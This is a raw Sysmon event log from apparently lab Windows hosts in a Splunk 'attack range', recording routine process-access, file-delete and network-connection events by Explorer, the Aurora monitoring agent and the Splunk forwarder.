10341000x800000000000000043000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:49.495{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:50.627{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE217B2A2D7312862936E1A377CBC9B7,SHA256=5715C82D6F3E153E94DA218D98FCD783FF0E2D65949632F5F17CA4CD5118DC3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016735Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:50.306{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC6CEBFC0FBE1B3C338FBF1B946CD40C,SHA256=8474FB927C80B29449976A48687C7DED9004DD119A92BB43EF5C0C920A62A772,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:50.390{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:50.390{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:50.390{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E499-63C7-3E06-00000000AF02}6872C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 354300x800000000000000043037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:47.618{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56334-false10.0.1.12-8000- 23542300x800000000000000016737Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:51.395{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F112E931D88FF4376F3B609CA6C9C2CD,SHA256=731CCD2ADF32DB91805EFCF1B4612A4FBD49F448757B2D5A1841EEE11DC6C464,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.893{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043065Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.878{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000043053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:51.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 